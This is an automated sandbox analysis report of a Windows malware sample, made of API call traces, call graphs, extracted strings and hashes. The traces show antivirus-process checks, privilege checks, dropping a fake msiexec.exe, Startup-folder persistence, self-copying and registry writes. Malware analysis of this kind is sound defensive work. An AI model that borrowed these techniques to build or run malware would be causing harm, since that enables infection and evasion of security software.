RtlEncodePointer 6280->6291 6283->6274 6283->6280 6284 40269f DecodePointer DecodePointer 6283->6284 6290 40200a RtlEncodePointer 6283->6290 6284->6283 6286 402742 6285->6286 6287 40271c 6285->6287 6293 40352b LeaveCriticalSection 6286->6293 6287->6272 6289 40352b LeaveCriticalSection 6287->6289 6289->6275 6290->6283 6291->6283 6292->6279 6293->6287 6295 402611 _doexit 66 API calls 6294->6295 6296 402778 6295->6296 6312 40247e 6313 4024ba 6312->6313 6314 402490 6312->6314 6314->6313 6316 4041f4 6314->6316 6317 404200 __mtinitlocknum 6316->6317 6318 4021ba __getptd 66 API calls 6317->6318 6319 404205 6318->6319 6322 40594f 6319->6322 6331 404293 DecodePointer 6322->6331 6324 405954 6325 40595f 6324->6325 6332 4042a0 6324->6332 6326 405977 6325->6326 6328 401e7f __call_reportfault 8 API calls 6325->6328 6329 402767 _abort 66 API calls 6326->6329 6328->6326 6330 405981 6329->6330 6331->6324 6333 4042ac __mtinitlocknum 6332->6333 6334 4042e9 DecodePointer 6333->6334 6335 404307 6333->6335 6336 4042d3 6333->6336 6342 4042cf 6333->6342 6339 4042d8 _siglookup 6334->6339 6335->6334 6340 404316 6335->6340 6337 402141 __getptd_noexit 66 API calls 6336->6337 6337->6339 6343 404373 6339->6343 6345 402767 _abort 66 API calls 6339->6345 6352 4042e1 __mtinitlocknum 6339->6352 6341 401ddb _malloc 66 API calls 6340->6341 6344 40431b 6341->6344 6342->6336 6342->6340 6347 403604 __lock 66 API calls 6343->6347 6348 40437e 6343->6348 6346 401ffa _raise 11 API calls 6344->6346 6345->6343 6346->6352 6347->6348 6350 4043b3 6348->6350 6353 40200a RtlEncodePointer 6348->6353 6354 404407 6350->6354 6352->6325 6353->6350 6355 404414 6354->6355 6356 40440d 6354->6356 6355->6352 6358 40352b LeaveCriticalSection 6356->6358 6358->6355 6303 401c5f 6304 401c74 6303->6304 6305 401c6e 6303->6305 6309 40278c 6304->6309 6306 402767 _abort 66 API calls 6305->6306 6306->6304 6308 401c79 __mtinitlocknum 6310 402611 _doexit 66 API calls 6309->6310 6311 402797 6310->6311 6311->6308

            Control-flow Graph

            APIs
              • Part of subcall function 00401000: GetVersionExW.KERNEL32(?), ref: 00401030
              • Part of subcall function 00401000: GetCurrentProcess.KERNEL32(00020008,?), ref: 0040104B
              • Part of subcall function 00401000: OpenProcessToken.ADVAPI32(00000000), ref: 00401052
              • Part of subcall function 00401000: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00401075
            • _memset.LIBCMT ref: 00401527
            • _memset.LIBCMT ref: 00401542
            • _memset.LIBCMT ref: 0040155D
            • _memset.LIBCMT ref: 00401578
            • _memset.LIBCMT ref: 00401594
            • GetTickCount.KERNEL32 ref: 0040159C
              • Part of subcall function 00401A4B: __getptd.LIBCMT ref: 00401A50
            • OpenMutexW.KERNEL32(001F0001,00000000,TLS), ref: 004015B6
            • _memset.LIBCMT ref: 004015D0
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040161B
            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040162F
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401647
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040169B
            • GetTempPathW.KERNEL32(00000104,?), ref: 004016AD
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 004016F1
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401726
            • WriteFile.KERNEL32(00000000,00409B10,00015891,?,00000000), ref: 00401741
            • CloseHandle.KERNEL32(00000000), ref: 00401748
            • ShellExecuteExW.SHELL32(0000003C), ref: 00401766
            • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000208), ref: 0040179A
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 004017DF
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401802
            • ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%,?,00000208), ref: 00401812
            • GetTempPathW.KERNEL32(00000104,?), ref: 00401824
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004018E9
            • WriteFile.KERNEL32(00000000,00409B10,00015891,?,00000000), ref: 00401904
            • CloseHandle.KERNEL32(00000000), ref: 0040190B
            • ShellExecuteExW.SHELL32(0000003C), ref: 00401929
            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040193E
            • FindFirstChangeNotificationW.KERNEL32(?,00000000,00000001), ref: 0040194A
            • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00401958
            • FindNextChangeNotification.KERNEL32(00000000), ref: 0040195B
            • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00401967
            • GetFileAttributesW.KERNEL32(?), ref: 00401970
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Create_memset$File$DirectoryNextObjectProcess32SingleWait$ChangeCloseEnvironmentExecuteExpandFindFirstHandleNotificationOpenPathProcessShellStringsTempTokenWrite$AttributesCountCurrentInformationMutexSnapshotTickToolhelp32Version__getptd
            • String ID: %ALLUSERSPROFILE%$%USERPROFILE%$.exe$<$@$TLS$\Local Settings$\MSI$\StArt menu\PROGraMs\StaRtup\(empty).lnk$\Temp$\msiexec.exe$avp.exe
            • API String ID: 2551661832-1653471747
            • Opcode ID: 69dfa76764e60a3861e15c6053272fee807c10cbfec4bdac134e18a40d4089da
            • Instruction ID: fc4d4cc7c3a3f39693fa932c2efe313973c120b32c5f279216d8c7e13d690431
            • Opcode Fuzzy Hash: 69dfa76764e60a3861e15c6053272fee807c10cbfec4bdac134e18a40d4089da
            • Instruction Fuzzy Hash: B1B167F19402186BE720EBA0CC85FDA737CAF44704F4086BAB605B61D1EB795F948F69
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetVersionExW.KERNEL32(?), ref: 00401030
            • GetCurrentProcess.KERNEL32(00020008,?), ref: 0040104B
            • OpenProcessToken.ADVAPI32(00000000), ref: 00401052
            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00401075
            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004010C4
            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004010DD
            • FreeSid.ADVAPI32(?), ref: 004010F4
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Token$Process$AllocateCheckCurrentFreeInformationInitializeMembershipOpenVersion
            • String ID:
            • API String ID: 2144733581-0
            • Opcode ID: bc5e636e3f20792d39db81558b6a1c48cad66fec7b540f6e23d222dc24549440
            • Instruction ID: 42bc32eec1429b5371f9bf7f58ed946eeadebff489582c99215efa076821d9f3
            • Opcode Fuzzy Hash: bc5e636e3f20792d39db81558b6a1c48cad66fec7b540f6e23d222dc24549440
            • Instruction Fuzzy Hash: 8D316171A00208AFDB10DFA1DD85BFEB3B8EB48305F0045EEA64AA6190DA349E94CF54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
              • Part of subcall function 00401000: GetVersionExW.KERNEL32(?), ref: 00401030
              • Part of subcall function 00401000: GetCurrentProcess.KERNEL32(00020008,?), ref: 0040104B
              • Part of subcall function 00401000: OpenProcessToken.ADVAPI32(00000000), ref: 00401052
              • Part of subcall function 00401000: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00401075
            • RegOpenKeyExW.KERNEL32 ref: 004012E5
            • RegCloseKey.ADVAPI32(?), ref: 004012F2
            • RegSetValueExW.KERNEL32 ref: 00401321
            • RegCloseKey.ADVAPI32(?), ref: 0040132E
            • RegOpenKeyExW.KERNEL32 ref: 0040134C
            • _memset.LIBCMT ref: 0040136A
            • _memset.LIBCMT ref: 00401385
            • _memset.LIBCMT ref: 004013A0
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004013B6
            • GetTempPathW.KERNEL32(00000104,?), ref: 004013C8
            • GetTempFileNameW.KERNEL32(?,0040792C,00000000,?), ref: 00401401
            • CopyFileW.KERNEL32 ref: 00401417
            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00401433
            • GetFileSize.KERNEL32(00000000,00000000), ref: 00401448
            • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 0040145A
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040146E
            • _rand.LIBCMT ref: 00401474
            • RegSetValueExW.KERNEL32 ref: 004014AA
            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004014B8
            • CloseHandle.KERNEL32(00000000), ref: 004014BF
            • RegCloseKey.ADVAPI32(?), ref: 004014CC
            • DeleteFileW.KERNEL32(?), ref: 004014D9
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: File$Close$Open_memset$NameProcessTempTokenValueVirtual$AllocCopyCreateCurrentDeleteFreeHandleInformationModulePathReadSizeVersion_rand
            • String ID: 00E35EEE$ImageBase$SOFTWARE$SOFTWARE\Microsoft
            • API String ID: 693823151-2382807074
            • Opcode ID: 158df57d4165a7c83e994cac4dba8edfbe2c1434f91deed46b9baa4026a3f672
            • Instruction ID: a240fd00b0f685ef9ea725f7c0a7f4e5701b82f883001beb35e5e8632b8dc4d9
            • Opcode Fuzzy Hash: 158df57d4165a7c83e994cac4dba8edfbe2c1434f91deed46b9baa4026a3f672
            • Instruction Fuzzy Hash: B051EBB1A80314BBE720DBA0DD4AFEA777DDF88704F1041B9B706B60D1D6B599508B6C
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 122 4024f9-40250a call 4024ce ExitProcess
            APIs
            • ___crtCorExitProcess.LIBCMT ref: 00402501
              • Part of subcall function 004024CE: GetModuleHandleW.KERNEL32(mscoree.dll,?,00402506,00000000,?,0040583D,000000FF,0000001E,00000001,00000000,00000000,?,00404126,00000000,00000001,00000000), ref: 004024D8
              • Part of subcall function 004024CE: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00402506,00000000,?,0040583D,000000FF,0000001E,00000001,00000000,00000000,?,00404126,00000000,00000001), ref: 004024E8
            • ExitProcess.KERNEL32 ref: 0040250A
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ExitProcess$AddressHandleModuleProc___crt
            • String ID:
            • API String ID: 2427264223-0
            • Opcode ID: 3c09b3463ed0e938e77df1f2eec3b316edc29e9afb0af13200940fbb9fed6152
            • Instruction ID: 55b3fd13d3930410ec0bd6ff67a48b9961f98913516eb3735291f5509673ab2b
            • Opcode Fuzzy Hash: 3c09b3463ed0e938e77df1f2eec3b316edc29e9afb0af13200940fbb9fed6152
            • Instruction Fuzzy Hash: D0B09B3100010CBBDB012F16DD0E8493F15DB40350711C035F40915471DF729D519594
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 125 401dee-401df8 126 401e15-401e1e 125->126 127 401dfa-401e04 125->127 129 401e20 126->129 130 401e21-401e26 126->130 127->126 128 401e06-401e14 call 401ddb 127->128 129->130 132 401e28-401e39 RtlAllocateHeap 130->132 133 401e3b-401e42 130->133 132->133 137 401e6d-401e6f 132->137 134 401e60-401e65 133->134 135 401e44-401e4d call 4033e1 133->135 134->137 139 401e67 134->139 135->130 141 401e4f-401e54 135->141 139->137 142 401e56 141->142 143 401e5c-401e5e 141->143 142->143 143->137
            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,00000008,?,004019C2,?,?,00000000,00000008,?,?,00401234,00000009,00000002), ref: 00401E31
              • Part of subcall function 00401DDB: __getptd_noexit.LIBCMT ref: 00401DDB
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: AllocateHeap__getptd_noexit
            • String ID:
            • API String ID: 328603210-0
            • Opcode ID: db9f48bcfdcd952d97516c4ad9846fc9f16d01eead63be7037a183a728ba2e56
            • Instruction ID: 56100bd5126312914a4cf2e54b5d4e9fc684f082ec158ef11dbc597ada45c8a9
            • Opcode Fuzzy Hash: db9f48bcfdcd952d97516c4ad9846fc9f16d01eead63be7037a183a728ba2e56
            • Instruction Fuzzy Hash: 3D01B1313012159BEB289F76DC54B6F3758AF817A0F01453BEC16AB2F0D73898018798
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 144 402751-40275d call 402611 146 402762-402766 144->146
            APIs
            • _doexit.LIBCMT ref: 0040275D
              • Part of subcall function 00402611: __lock.LIBCMT ref: 0040261F
              • Part of subcall function 00402611: RtlDecodePointer.NTDLL(00407B90,00000020,00402778,00000000,00000001,00000000,?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 0040265B
              • Part of subcall function 00402611: DecodePointer.KERNEL32(?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 0040266C
              • Part of subcall function 00402611: DecodePointer.KERNEL32(-00000004,?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 00402692
              • Part of subcall function 00402611: DecodePointer.KERNEL32(?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 004026A5
              • Part of subcall function 00402611: DecodePointer.KERNEL32(?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 004026AF
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: DecodePointer$__lock_doexit
            • String ID:
            • API String ID: 3343572566-0
            • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
            • Instruction ID: 2835470756025a3359128ba12a19751557f739aa17dcde0f0a27c1decc4f0477
            • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
            • Instruction Fuzzy Hash: BBB0923258020833DA202542AC0BF063A0987C1B64E680061BA0C291E1A9A3B9618089
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 147 40200a-402012 RtlEncodePointer
            APIs
            • RtlEncodePointer.NTDLL(00000000,004047C1,00426880,00000314,00000000,?,?,?,?,?,0040291C,00426880,Microsoft Visual C++ Runtime Library,00012010), ref: 0040200C
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: EncodePointer
            • String ID:
            • API String ID: 2118026453-0
            • Opcode ID: f13c84878780a0640bfe0c7d6e936be8079c7ea07e2e3e3b0fcd0b513671049b
            • Instruction ID: 4816118a2607bd65971d862af3c7b0bfd17682bfab921533bb1fce046072eb2b
            • Opcode Fuzzy Hash: f13c84878780a0640bfe0c7d6e936be8079c7ea07e2e3e3b0fcd0b513671049b
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 00401D4E
            • SetUnhandledExceptionFilter.KERNEL32 ref: 00401D63
            • UnhandledExceptionFilter.KERNEL32(004061EC), ref: 00401D6E
            • GetCurrentProcess.KERNEL32(C0000409), ref: 00401D8A
            • TerminateProcess.KERNEL32(00000000), ref: 00401D91
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: 81cb7dbcff39d8609ecacbd0f084c8f9c29420ea19ee6c4832bb0335e36c9e6f
            • Instruction ID: b169cc00e7c4ed4ce90c2bd3d00b4e4eba92b37a002916addad9849010ed146c
            • Opcode Fuzzy Hash: 81cb7dbcff39d8609ecacbd0f084c8f9c29420ea19ee6c4832bb0335e36c9e6f
            • Instruction Fuzzy Hash: 072123B4A11204EFD720DF24FE446043BB4BB08314F82407AE909A33B5EBB55A86CF5D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: _calloc
            • String ID: abcdefghijklmnopqrstuvxyz
            • API String ID: 1679841372-3395597499
            • Opcode ID: 3b99a827032a1efea53796c2415dfc32b5755cb1f5537b45daff8ea78a204b4c
            • Instruction ID: b11a14f750e411699c7cda967f5c8f1b4767afd2ccc79c3245f504d447faffa6
            • Opcode Fuzzy Hash: 3b99a827032a1efea53796c2415dfc32b5755cb1f5537b45daff8ea78a204b4c
            • Instruction Fuzzy Hash: 6EF0C836F0011557C720975DEC0179A3399DBC4361F4541BBED48D7350EA759E1582D9
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 415 402303-402315 GetModuleHandleW 416 402320-402368 GetProcAddress * 4 415->416 417 402317-40231f call 402050 415->417 419 402380-40239f 416->419 420 40236a-402371 416->420 423 4023a4-4023b2 TlsAlloc 419->423 420->419 422 402373-40237a 420->422 422->419 424 40237c-40237e 422->424 425 4023b8-4023c3 TlsSetValue 423->425 426 402479 423->426 424->419 424->423 425->426 427 4023c9-40240f call 402523 EncodePointer * 4 call 40348a 425->427 428 40247b-40247d 426->428 433 402411-40242e DecodePointer 427->433 434 402474 call 402050 427->434 433->434 437 402430-402442 call 40415a 433->437 434->426 437->434 440 402444-402457 DecodePointer 437->440 440->434 442 402459-402472 call 40208d GetCurrentThreadId 440->442 442->428
            APIs
            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401BA6), ref: 0040230B
            • __mtterm.LIBCMT ref: 00402317
              • Part of subcall function 00402050: DecodePointer.KERNEL32(00000003,00402479,?,00401BA6), ref: 00402061
              • Part of subcall function 00402050: TlsFree.KERNEL32(00000015,00402479,?,00401BA6), ref: 0040207B
              • Part of subcall function 00402050: DeleteCriticalSection.KERNEL32(00000000,00000000,774EB15F,?,00402479,?,00401BA6), ref: 004034F1
              • Part of subcall function 00402050: _free.LIBCMT ref: 004034F4
              • Part of subcall function 00402050: DeleteCriticalSection.KERNEL32(00000015,774EB15F,?,00402479,?,00401BA6), ref: 0040351B
            • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00401BA6), ref: 0040232D
            • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00401BA6), ref: 0040233A
            • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00401BA6), ref: 00402347
            • GetProcAddress.KERNEL32(00000000,FlsFree,?,00401BA6), ref: 00402354
            • TlsAlloc.KERNEL32(?,00401BA6), ref: 004023A4
            • TlsSetValue.KERNEL32(00000000,?,00401BA6), ref: 004023BF
            • __init_pointers.LIBCMT ref: 004023C9
            • EncodePointer.KERNEL32(?,00401BA6), ref: 004023DA
            • EncodePointer.KERNEL32(?,00401BA6), ref: 004023E7
            • EncodePointer.KERNEL32(?,00401BA6), ref: 004023F4
            • EncodePointer.KERNEL32(?,00401BA6), ref: 00402401
            • DecodePointer.KERNEL32(004021D4,?,00401BA6), ref: 00402422
            • __calloc_crt.LIBCMT ref: 00402437
            • DecodePointer.KERNEL32(00000000,?,00401BA6), ref: 00402451
            • GetCurrentThreadId.KERNEL32(?,00401BA6), ref: 00402463
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
            • API String ID: 3698121176-3819984048
            • Opcode ID: 6864959bad21f16efcd608d5513ee2a71937084775e2493dc546c8a40c0c37da
            • Instruction ID: dc2f2d14b3d5f79f5eea71b86655991f8044967a8e8a5a9da60b5ef0e6218753
            • Opcode Fuzzy Hash: 6864959bad21f16efcd608d5513ee2a71937084775e2493dc546c8a40c0c37da
            • Instruction Fuzzy Hash: 11317071A41311ABC731BF79AE0CA167AE4EB44360756063BE915B62F0DBB88462CF5C
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CoInitialize.OLE32(00000000), ref: 00401118
            • CoCreateInstance.OLE32(004061CC,00000000,00000001,004061BC,?), ref: 00401138
            • CoUninitialize.OLE32 ref: 004011E3
            • CoUninitialize.OLE32 ref: 00401211
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Uninitialize$CreateInitializeInstance
            • String ID: C:\$shell32.dll
            • API String ID: 1968832861-1586883061
            • Opcode ID: f8298a3f2e42d5c23b232cde7a4a42f278af90a4b026be23ee81adac31167ce6
            • Instruction ID: 1f0791a87f4a97ea7e528ad9acff92eae43fbf075af62516d5be8bbe8364a1ed
            • Opcode Fuzzy Hash: f8298a3f2e42d5c23b232cde7a4a42f278af90a4b026be23ee81adac31167ce6
            • Instruction Fuzzy Hash: 5441EB34700604AFC700EBA4CD85F5AB7B9AF8D704F218594E609EB3A1DA75ED02DB54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00407B40,00000008,00402195,00000000,00000000,?,00000008,00401DE0,00401E0B,?,004019C2,?,?,00000000,00000008), ref: 0040209E
            • __lock.LIBCMT ref: 004020D2
              • Part of subcall function 00403604: __mtinitlocknum.LIBCMT ref: 0040361A
              • Part of subcall function 00403604: __amsg_exit.LIBCMT ref: 00403626
              • Part of subcall function 00403604: EnterCriticalSection.KERNEL32(?,?,?,004020D7,0000000D), ref: 0040362E
            • InterlockedIncrement.KERNEL32(00409540), ref: 004020DF
            • __lock.LIBCMT ref: 004020F3
            • ___addlocaleref.LIBCMT ref: 00402111
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
            • String ID: KERNEL32.DLL
            • API String ID: 637971194-2576044830
            • Opcode ID: 940bf6df545ee205c965a4f6310594f5e4803979cf951170b273b84f29b5696c
            • Instruction ID: a693a190344d3e7315565d47fceabcf9e7fcc4da82ce88568d0924fc5f8a8f6b
            • Opcode Fuzzy Hash: 940bf6df545ee205c965a4f6310594f5e4803979cf951170b273b84f29b5696c
            • Instruction Fuzzy Hash: DE01A171444700AAD320AF67C90670AFBE0AF04329F10892FE596763E1CBB8A644CB1C
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __getptd.LIBCMT ref: 00403B9F
              • Part of subcall function 004021BA: __getptd_noexit.LIBCMT ref: 004021BD
              • Part of subcall function 004021BA: __amsg_exit.LIBCMT ref: 004021CA
            • __amsg_exit.LIBCMT ref: 00403BBF
            • __lock.LIBCMT ref: 00403BCF
            • InterlockedDecrement.KERNEL32(?), ref: 00403BEC
            • _free.LIBCMT ref: 00403BFF
            • InterlockedIncrement.KERNEL32(00562B18), ref: 00403C17
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
            • String ID:
            • API String ID: 3470314060-0
            • Opcode ID: ef77dee553785f9e1eefaadb346c389977e9e5a0b2e160be006d7c3092e8dbb2
            • Instruction ID: 4b89cff51d31dcc750218b40562fc0d4efbfb233843013565e2ea479e822e852
            • Opcode Fuzzy Hash: ef77dee553785f9e1eefaadb346c389977e9e5a0b2e160be006d7c3092e8dbb2
            • Instruction Fuzzy Hash: ED018E32905621A7DB21AF26990975A7B78AB05B2AF05403FE411B73D2D73C6E81CFCD
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • _malloc.LIBCMT ref: 004058B0
              • Part of subcall function 0040580E: __FF_MSGBANNER.LIBCMT ref: 00405827
              • Part of subcall function 0040580E: __NMSG_WRITE.LIBCMT ref: 0040582E
              • Part of subcall function 0040580E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00404126,00000000,00000001,00000000,?,0040358F,00000018,00407BB0,0000000C,0040361F), ref: 00405853
            • _free.LIBCMT ref: 004058C3
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: AllocHeap_free_malloc
            • String ID:
            • API String ID: 2734353464-0
            • Opcode ID: 79b783235ddf0561d23002c2b4c80df8f46179e38e11d1e51a4cc4586df10535
            • Instruction ID: b0c9d25eed03681bba46b06a89ad8b97e27e9f00ebc9b329a604ee99565fb911
            • Opcode Fuzzy Hash: 79b783235ddf0561d23002c2b4c80df8f46179e38e11d1e51a4cc4586df10535
            • Instruction Fuzzy Hash: 9F11C472404A15EBCB213B72A80465B3B99DF41375F21443FFD05B62E0EA3C89518EAC
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __getptd.LIBCMT ref: 00403903
              • Part of subcall function 004021BA: __getptd_noexit.LIBCMT ref: 004021BD
              • Part of subcall function 004021BA: __amsg_exit.LIBCMT ref: 004021CA
            • __getptd.LIBCMT ref: 0040391A
            • __amsg_exit.LIBCMT ref: 00403928
            • __lock.LIBCMT ref: 00403938
            • __updatetlocinfoEx_nolock.LIBCMT ref: 0040394C
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
            • String ID:
            • API String ID: 938513278-0
            • Opcode ID: a4d526dbc04fae7416bdbd0cbbd5ca37898f1f9f7701fea917be3d778c5da96a
            • Instruction ID: 162309ee8381cac5ae95c435e5847bcedeee526b30edb68623fe34d5fc0ab34c
            • Opcode Fuzzy Hash: a4d526dbc04fae7416bdbd0cbbd5ca37898f1f9f7701fea917be3d778c5da96a
            • Instruction Fuzzy Hash: 1CF0F672904700AAD721BF76590B70E7BA4AF0472AF10417FF1407A2D2CBBC1A018A4D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetEnvironmentStringsW.KERNEL32(00000000,00401BDB), ref: 00402E3A
            • __malloc_crt.LIBCMT ref: 00402E69
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00402E76
            Memory Dump Source
            • Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: EnvironmentStrings$Free__malloc_crt
            • String ID:
            • API String ID: 237123855-0
            • Opcode ID: 6db9315cda77603ae6b6e879c7adefdf1762131a3815c6aa2659d402f6a5b4f4
            • Instruction ID: 495fe5763f833bcfed8b486dfd6288ccedb650f7fc1d67f7aee55d8664e5d2b8
